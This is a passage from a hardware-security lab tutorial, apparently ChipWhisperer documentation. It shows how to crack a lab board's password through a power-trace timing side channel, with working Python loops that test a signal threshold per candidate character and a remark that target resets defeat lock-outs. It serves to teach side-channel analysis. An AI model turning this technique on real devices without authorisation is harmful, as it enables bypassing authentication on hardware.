Performing the Timing Attack: Finished overhaul
<li>Close any open ChipWhisperer-Capture windows, and run the script as before. You should connect to the target, and be able to press ''Capture 1'' and see the correct waveform.</li>
</ol>
 
== Running a Single Capture ==
With our settings prepared, the next step is to use our script to record and analyze a power trace. We need to be able to get the trace data into our Python script so we can analyze it for the timing attack.
 
The API allows us to ''press the Capture 1'' button and ''view the power trace'' without using the GUI. There are two relevant commands here:
* <code> self.api.capture1()</code> acts as if we've just pressed the ''Capture 1'' button;
* <code> self.api.getScope().datapoints</code> stores a list of datapoints that were recorded in the previous capture.
We want to test these two commands. After the setup portion of your script, add some code similar to the following:
<pre>
self.api.capture1()
data = self.api.getScope().datapoints
print data
</pre>
Run your script. The ChipWhisperer should automatically capture one trace and print out several thousand datapoints. This is all we need to continue.
 
== Attacking a Single Letter ==
Now that we can record one power trace, we can start the timing attack. Our goal here is to automatically find the first letter of the Super Secret (tm) password.
Look at this example of the power traces when 0 and 1 bytes are correct. We can see a clear point that appears to shift forward in time:

[[File:Passwordcrackerpts.png|image]]

When we guess the first byte incorrectly, there is a distinct power spike at sample number 153. However, when we guess correctly, the target spends more time processing the password, and this spike moves 72 samples forward. This means that we can check if our first byte is correct by looking at this one data point: if we're right, it will have an amplitude greater than -0.2. Note that the specific point will change for different hardware, and may also change if you use a different version of avr-gcc to compile the target code. The example code here was compiled with WinAVR 20100110, which has avr-gcc 4.3.3. If you view the video version of this tutorial the point numbers are different, for example, so be sure to check what they are for your specific system.

Add a loop to your script that does the following:
* Sets the ''Go Command'' to the next character we want to try
* Captures a power trace
* Checks if sample 153 is above -0.2 (fill in the appropriate numbers for your setup here)
* Repeats for all characters we want to try

An example loop is:
<pre>
trylist = 'abcdefghijklmnopqrstuvwxyz0123456789'
for c in trylist:
    # Test this password and record a power trace
    self.api.setParameter(['Simple Serial', 'Go Command', '%c\n' % c])
    self.api.capture1()

    # Get the data and check data[153]
    data = self.api.getScope().datapoints
    if data[153] > -0.2:
        print "Success: " + c
</pre>
This script will eventually stop, but you can use Ctrl+C on the command line to kill it. Make sure your script prints "Success: h"!

== Attacking the Full Password ==
The last step is to attack the entire password, one letter at a time. The procedure to do this is:
* Start with a blank password string
* Loop through all of the characters we want to try:
** Add the next character to the end of the password
** Test this new candidate password using code similar to the above
** If the new password is correct up to character (1, 2, ..., 5), add the character to the end of the password
* Repeat until we've cracked all 5 characters

Note that the point of interest is no longer at sample 153. We noticed earlier that this key point moves 72 samples forward for every correct character, so we'll have to check location <code>153</code> for character 0, <code>153 + 72</code> for character 1, and <code>153 + i*72</code> for character <code>i</code>.

An example of this loop is:
<pre>
password = ''
trylist = 'abcdefghijklmnopqrstuvwxyz0123456789'

for i in range(0, 5):
    for c in trylist:
        # Get a power trace using our next attempt
        nextPass = password + '{}'.format(c)
        self.api.setParameter(['Simple Serial', 'Go Command', '{}\n'.format(nextPass)])
        self.api.capture1()

        # Grab the trace
        nextTrace = self.api.getScope().datapoints

        # Check location 153, 225, etc. If it's too low, we've failed
        if nextTrace[153 + 72*i] < -0.2:
            continue

        # If we got here, we've found the right letter
        password += c
        print '{} characters: {}'.format(i+1, password)
        break
</pre>
After some time, this prints <code>5 characters: h0px3</code> -- it automatically finds the correct password.
That's it! You should have successfully cracked a password using the timing attack. Some notes on this method:
* The target device has a finite start-up time, which slows down the attack. If you wish, remove some of the printf()'s from the target code, recompile and reprogram, and see how quickly you can do this attack.
* The current script doesn't look for the "WELCOME" message when the password is OK. That is an extension that allows it to crack any size password.
* If there was a lock-out on a wrong password, the system would ignore it, as it resets the target after every attempt.
= Conclusion =